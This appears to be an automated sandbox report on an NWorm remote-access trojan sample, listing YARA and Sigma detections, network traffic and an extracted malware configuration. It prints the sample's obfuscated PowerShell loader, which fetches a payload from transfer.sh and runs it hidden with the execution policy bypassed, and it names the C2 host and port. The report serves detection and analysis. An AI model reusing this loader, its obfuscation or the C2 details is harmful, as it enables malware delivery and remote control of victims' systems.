11.0.aspnet_compiler.exe.400000.1.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x1f6d:$id1: N-W0rm 0x2558:$id1: N-W0rm 0x3247:$x1: pongPing 0x3259:$x2: \|NW\| 0x2e70:$s1: runFile 0x2e80:$s2: runUrl 0x2ed0:$s3: killer 0x2ef0:$s4: powershell 0x30ac:$s5: wscript.exe 0x2f08:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x30c5:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 0x31e7:$s8: Start-Sleep -Seconds 1.5; Remove-Item -Path '
11.0.aspnet_compiler.exe.400000.2.unpack	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
11.0.aspnet_compiler.exe.400000.2.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x2fec:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3050:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3048:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
11.0.aspnet_compiler.exe.400000.2.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x1f6d:$id1: N-W0rm 0x2558:$id1: N-W0rm 0x3247:$x1: pongPing 0x3259:$x2: \|NW\| 0x2e70:$s1: runFile 0x2e80:$s2: runUrl 0x2ed0:$s3: killer 0x2ef0:$s4: powershell 0x30ac:$s5: wscript.exe 0x2f08:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x30c5:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 0x31e7:$s8: Start-Sleep -Seconds 1.5; Remove-Item -Path '
10.2.powershell.exe.1a640e0e328.2.raw.unpack	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
10.2.powershell.exe.1a640e0e328.2.raw.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x1f6d:$id1: N-W0rm 0x2558:$id1: N-W0rm 0x5027fd:$id1: N-W0rm 0x502de8:$id1: N-W0rm 0x3247:$x1: pongPing 0x503ad7:$x1: pongPing 0x3259:$x2: \|NW\| 0x503ae9:$x2: \|NW\| 0x2e70:$s1: runFile 0x503700:$s1: runFile 0x2e80:$s2: runUrl 0x503710:$s2: runUrl 0x2ed0:$s3: killer 0x503760:$s3: killer 0x2ef0:$s4: powershell 0x503780:$s4: powershell 0x30ac:$s5: wscript.exe 0x50393c:$s5: wscript.exe 0x2f08:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x503798:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x30c5:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
10.2.powershell.exe.1a640c386a0.1.raw.unpack	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
10.2.powershell.exe.1a640c386a0.1.raw.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x1d7bf5:$id1: N-W0rm 0x1d81e0:$id1: N-W0rm 0x6d8485:$id1: N-W0rm 0x6d8a70:$id1: N-W0rm 0x1d8ecf:$x1: pongPing 0x6d975f:$x1: pongPing 0x1d8ee1:$x2: \|NW\| 0x6d9771:$x2: \|NW\| 0x1d8af8:$s1: runFile 0x6d9388:$s1: runFile 0x1d8b08:$s2: runUrl 0x6d9398:$s2: runUrl 0x1d8b58:$s3: killer 0x6d93e8:$s3: killer 0x1d8b78:$s4: powershell 0x6d9408:$s4: powershell 0x1d8d34:$s5: wscript.exe 0x6d95c4:$s5: wscript.exe 0x1d8b90:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x6d9420:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x1d8d4d:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
10.2.powershell.exe.1a640da2068.0.raw.unpack	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
10.2.powershell.exe.1a640da2068.0.raw.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x6e22d:$id1: N-W0rm 0x6e818:$id1: N-W0rm 0x56eabd:$id1: N-W0rm 0x56f0a8:$id1: N-W0rm 0x6f507:$x1: pongPing 0x56fd97:$x1: pongPing 0x6f519:$x2: \|NW\| 0x56fda9:$x2: \|NW\| 0x6f130:$s1: runFile 0x56f9c0:$s1: runFile 0x6f140:$s2: runUrl 0x56f9d0:$s2: runUrl 0x6f190:$s3: killer 0x56fa20:$s3: killer 0x6f1b0:$s4: powershell 0x56fa40:$s4: powershell 0x6f36c:$s5: wscript.exe 0x56fbfc:$s5: wscript.exe 0x6f1c8:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x56fa58:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x6f385:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Click to see the 22 entries

Other

Source	Rule	Description	Author	Strings
amsi64_7112.amsi.csv	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0xdcab:$sb3: -WIndoWSTYLe HiDdeN 0x2e75b:$sb3: -WIndoWSTYLe HiDdeN 0xdc9f:$sc1: -Nop 0x2e74f:$sc1: -Nop 0xdca4:$sd1: -NonI 0x2e754:$sd1: -NonI 0xdcbf:$se3: -ExecutionPolicy Bypass 0x2e76f:$se3: -ExecutionPolicy Bypass

Sigma Signatures

System Summary

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7112, TargetFilename: C:\ProgramData\ICPDRCYNSQCDVKBIWIFZCD\ICPDRCYNSQCDVKBIWIFZCD.bat

Source: Process started

Author: frack113: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6592, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 6880

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_o)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_a)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_d)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),'67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-s67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-t67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-r67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-i67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-n67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-g67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-',''),'%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_o)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_a)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_d)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),'67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-s67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-t67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-r67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-i67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-n67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-g67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-',''),'%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132912735750454997.7112.DefaultAppDomain.powershell

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 11.0.aspnet_compiler.exe.400000.4.unpack

Malware Configuration Extractor: NWorm {"Host": "nyanwmoney.duckdns.org", "Port": "8891", "Mutex": "594274bc", "Version": "v0.3.8", "Network Seprator": "|NW|"}

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49771 version: TLS 1.0

Source:

Binary string: ClassLibrary1.pdb source: powershell.exe, 0000000A.00000002.949909108.000001A658B40000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.944900247.000001A640AD2000.00000004.00000800.00020000.00000000.sdmp

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: nyanwmoney.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: nyanwmoney.duckdns.org

Source: Joe Sandbox View

ASN Name: M247GB M247GB

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: global traffic

HTTP traffic detected: GET /get/8J0O0I/Server435.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 37.120.141.190 37.120.141.190
Source: Joe Sandbox View	IP Address: 144.76.136.153 144.76.136.153
Source: Joe Sandbox View	IP Address: 144.76.136.153 144.76.136.153

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49771 version: TLS 1.0

Source: global traffic

TCP traffic: 192.168.2.5:49779 -> 37.120.141.190:8891

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: powershell.exe, 00000002.00000003.439062238.000001EE7C64A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.953495769.000001EE7C64A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.949251029.000001A658935000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.953679906.000001EE7C810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m&
Source: powershell.exe, 00000002.00000003.439498717.000001EE7C958000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.439275078.000001EE7C92B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.439437787.000001EE7C945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsof
Source: powershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.944963438.000001EE644E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.943977734.000001EE642D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.943924547.000001A6408C1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.943675482.0000000003222000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.943615778.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.951646438.000001EE654C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://transfer.sh
Source: powershell.exe, 00000002.00000002.944963438.000001EE644E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.949377445.000001A6589CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.A
Source: powershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.944963438.000001EE644E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.951940043.000001EE655DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.944963438.000001EE644E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.951619061.000001EE654B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh
Source: wscript.exe, wscript.exe, 00000000.00000003.422141955.000002D263133000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.428034000.000002D2616A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.428144405.000002D263133000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.421946450.000002D263127000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.428138665.000002D263120000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/8J0O0I/Se
Source: powershell.exe, 00000002.00000002.947754218.000001EE649AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948316787.000001EE64CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947600493.000001EE6492C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947928671.000001EE64A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947097260.000001EE6480A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947552930.000001EE6490D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948531822.000001EE64D70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947842716.000001EE64A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948056804.000001EE64AF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948070341.000001EE64AFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947244377.000001EE64846000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.951334266.000001EE653F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948446290.000001EE64D3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948106783.000001EE64B19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.946965465.000001EE647DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.946689944.000001EE6478B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947963667.000001EE64A96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/8J0O0I/Serv
Source: wscript.exe, 00000000.00000003.424203468.000002D26132C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.427392004.000002D261330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/8J0O0I/Server435.
Source: powershell.exe, 00000002.00000002.948298244.000001EE64CCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.946689944.000001EE6478B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.943977734.000001EE642D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947963667.000001EE64A96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/8J0O0I/Server435.txt
Source: powershell.exe, 0000000A.00000002.949279399.000001A65895F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.vign.

Source: unknown

DNS traffic detected: queries for: store-images.s-microsoft.com

Source: global traffic

HTTP traffic detected: GET /get/8J0O0I/Server435.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 11.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 11.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 11.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 11.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 11.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 10.2.powershell.exe.1a640e0e328.2.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 10.2.powershell.exe.1a640e0e328.2.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 11.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 11.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 11.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 11.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 10.2.powershell.exe.1a640e0e328.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 10.2.powershell.exe.1a640c386a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 10.2.powershell.exe.1a640da2068.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 0000000B.00000000.526861512.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000B.00000000.527798017.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000B.00000000.527148888.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000B.00000002.942336968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000B.00000000.527508335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: aspnet_compiler.exe PID: 6880, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen

Very long command line found

Source: unknown

Process created: Commandline size = 6411

Source: amsi64_7112.amsi.csv, type: OTHER	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 11.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 11.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
